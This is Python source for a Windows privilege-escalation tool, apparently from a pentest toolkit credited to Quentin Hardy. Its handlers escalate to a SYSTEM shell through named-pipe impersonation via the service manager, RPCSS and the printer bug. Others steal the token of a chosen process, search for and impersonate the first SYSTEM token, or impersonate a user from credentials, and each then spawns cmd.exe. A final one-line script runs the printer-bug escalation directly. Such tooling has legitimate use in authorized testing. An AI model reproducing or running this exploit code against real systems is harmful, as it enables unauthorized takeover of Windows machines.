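def scm(args):
    '''
    Try to obtain a SYSTEM shell through named-pipe impersonation via the SCM.

    Runs only when ``args["toSystem"]`` is set; otherwise the handler is a
    silent no-op (no message is printed), exactly as before.

    :param args: parsed options; the key ``"toSystem"`` must be present
    :return: None
    '''
    if not args["toSystem"]:
        # Nothing was requested for this handler; keep the original silence
        # rather than inventing a new error message.
        return
    printT("Try to spawn a system shell via scm & impersonation...")
    esc = Escalation()
    imp = Impersonate()
    # ps=True / debug=False are the options the original passed; their exact
    # meaning is defined in Escalation and is not visible here.
    status = esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
    # Print the thread's effective token whether or not the escalation
    # reported success, so a failed attempt is still diagnosable.
    imp.printCurrentThreadEffectiveToken()
    if status:
        # A fresh Impersonate object is used for the spawn, as in the
        # original -- presumably to re-read the escalated thread token; confirm.
        imp = Impersonate()
        imp.executeCMDWithThreadEffectiveToken()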
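def rpcss(args):
    '''
    Try to obtain a shell through named-pipe impersonation via RPCSS.

    :param args: parsed options; unused here, kept for the common handler signature
    :return: None; failure is reported with ``logging.error``
    '''
    printT("Trying to exploit 'RPCSS'...")
    printT("It can take many seconds, so wait...")
    esc = Escalation()
    status = esc.namedPipeImpersonationSystemViaRPCSS()
    if not status:
        logging.error("Impossible to exploit 'RPCSS'")
        return
    imp = Impersonate()
    # enableAllUserRights presumably enables the privileges present on the
    # impersonated token before the spawn; semantics live in Impersonate.
    imp.enableAllUserRights()
    imp.executeCMDWithThreadEffectiveToken()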
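def imppid(args):
    '''
    Impersonate the primary token of process ``args['pid']`` and spawn cmd.exe.

    :param args: parsed options; ``'pid'`` is required (``None`` is rejected)
    :return: None; failures are reported with ``logging.error``
    '''
    pid = args['pid']
    if pid is None:
        logging.error("A pid has to be selected")
        return
    printT("Impersonating primary token of pid {0}".format(pid))
    imp = Impersonate()
    # Called once here on the caller's own token and once more below on the
    # impersonated token, as in the original.
    imp.enableAllUserRights()
    status = imp.impersonateViaPID(pid=pid)
    if not status:
        logging.error("Impossible to impersonate")
        return
    printT("Trying to open a cmd shell...")
    printT(
        "NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell"
    )
    imp.printCurrentThreadEffectiveToken()
    imp.enableAllUserRights()
    imp.executeCMDWithThreadEffectiveToken()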
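def searchimpfirstsystem(args):
    '''
    Impersonate the first available "nt authority\\system" token and prompt a cmd.exe.

    :param args: parsed options; ``args['pid']`` is passed through as ``targetPID``
        (its exact meaning is defined in Impersonate)
    :return: True if the shell was started, otherwise False
    '''
    printT("Searching and impersonating first nt authority\\system token...")
    imp = Impersonate()
    status = imp.searchAndImpersonateFirstSystemToken(targetPID=args['pid'], printAllTokens=False)
    if not status:
        logging.error("Impossible to prompt a cmd.exe as system.")
        return False
    imp.enableAllUserRights()
    imp.executeCMDWithThreadEffectiveToken()
    printT("cmd.exe prompt started as system")
    return True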
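def impuser(args):
    '''
    Impersonate a user from explicit credentials and spawn a shell.

    NOTE(review): the password is read from ``args``, which presumably comes
    from the command line, where it may be visible in process listings and
    shell history -- confirm how the caller supplies it.

    :param args: parsed options; ``'username'`` and ``'password'`` are required,
        ``'domain'`` is passed through as given
    :return: None; failures are reported with ``logging.error``
    '''
    if args['username'] is None or args['password'] is None:
        logging.error("username or password has to be given")
        return
    printT("Try to impersonate via creds...")
    imp = Impersonate()
    # Interactive logon with the default provider, as in the original.
    status = imp.impersonateViaCreds(
        login=args['username'],
        password=args['password'],
        domain=args['domain'],
        logonType=LOGON32_LOGON_INTERACTIVE,
        logonProvider=LOGON32_PROVIDER_DEFAULT)
    if not status:
        logging.error("Impossible to impersonate via creds")
        return
    printT("Impersonation success, try to spawn a shell...")
    printT(
        "SE_INCREASE_QUOTA_NAME and SE_ASSIGNPRIMARYTOKEN_NAME should be required"
    )
    imp.printCurrentThreadEffectiveToken(printFull=True, printLinked=False)
    imp.executeCMDWithThreadEffectiveToken()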
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate esc = Escalation() esc.namedPipeImpersonationSystemViaPrinterBug() imp = Impersonate() imp.enableAllUserRights() #Not necessary but we can do it, we do it imp.executeCMDWithThreadEffectiveToken()